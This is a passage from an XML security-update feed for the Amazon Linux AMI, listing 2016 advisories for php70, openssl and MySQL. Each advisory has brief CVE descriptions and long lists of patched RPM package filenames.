epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.26-1.128.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.26" release="1.128.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.26-1.128.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-754</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-754: medium priority package update for php70</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7418:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.
1377352:
CVE-2016-7418 php: Null pointer dereference in php_wddx_push_element
CVE-2016-7417:
ext/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data.
1377344:
CVE-2016-7417 php: Missing type check when unserializing SplArray
CVE-2016-7416:
ext/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument.
1377340:
CVE-2016-7416 php: Stack based buffer overflow in msgfmt_format_message
CVE-2016-7414:
The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.
1377336:
CVE-2016-7414 php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile
CVE-2016-7413:
Use-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call.
1377314:
CVE-2016-7413 php: Use after free in wddx_deserialize
CVE-2016-7412:
ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.
1377311:
CVE-2016-7412 php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7412" title="" id="CVE-2016-7412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7413" title="" id="CVE-2016-7413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7414" title="" id="CVE-2016-7414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7416" title="" id="CVE-2016-7416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7417" title="" id="CVE-2016-7417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7418" title="" id="CVE-2016-7418" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-tidy" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.11-1.16.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.11-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-755</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-755: medium priority package update for openssl</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6306:
Multiple out of bounds read flaws were found in the way OpenSSL handled certain TLS/SSL protocol handshake messages. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL.
1377594:
CVE-2016-6306 openssl: certificate message OOB reads
CVE-2016-6302:
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. A remote attacker could use this flaw to crash a TLS server using OpenSSL if it used SHA-512 as HMAC for session tickets.
1369855:
CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks
CVE-2016-2183:
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.
1369383:
CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)
CVE-2016-2182:
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. An attacker able to make an application using OpenSSL to process a large BIGNUM could cause the application to crash or, possibly, execute arbitrary code.
1367340:
CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()
CVE-2016-2181:
A flaw was found in the Datagram TLS (DTLS) replay protection implementation in OpenSSL. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection.
1369113:
CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection
CVE-2016-2180:
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker.
1359615:
CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()
CVE-2016-2179:
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory.
1369504:
CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer
CVE-2016-2178:
It was discovered that OpenSSL did not always use constant time operations when computing Digital Signature Algorithm (DSA) signatures. A local attacker could possibly use this flaw to obtain a private DSA key belonging to another user or service running on the same system.
1343400:
CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation
CVE-2016-2177:
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash.
1341705:
CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2177" title="" id="CVE-2016-2177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2178" title="" id="CVE-2016-2178" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2179" title="" id="CVE-2016-2179" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2180" title="" id="CVE-2016-2180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2181" title="" id="CVE-2016-2181" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2182" title="" id="CVE-2016-2182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2183" title="" id="CVE-2016-2183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6302" title="" id="CVE-2016-6302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6306" title="" id="CVE-2016-6306" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-15.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-756</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-756: important priority package update for mysql55 mysql56</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6662:
It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server.
1375198:
CVE-2016-6662 mysql: general_log can write to configuration files, leading to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662" title="" id="CVE-2016-6662" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.33" release="1.21.amzn1" epoch="0" 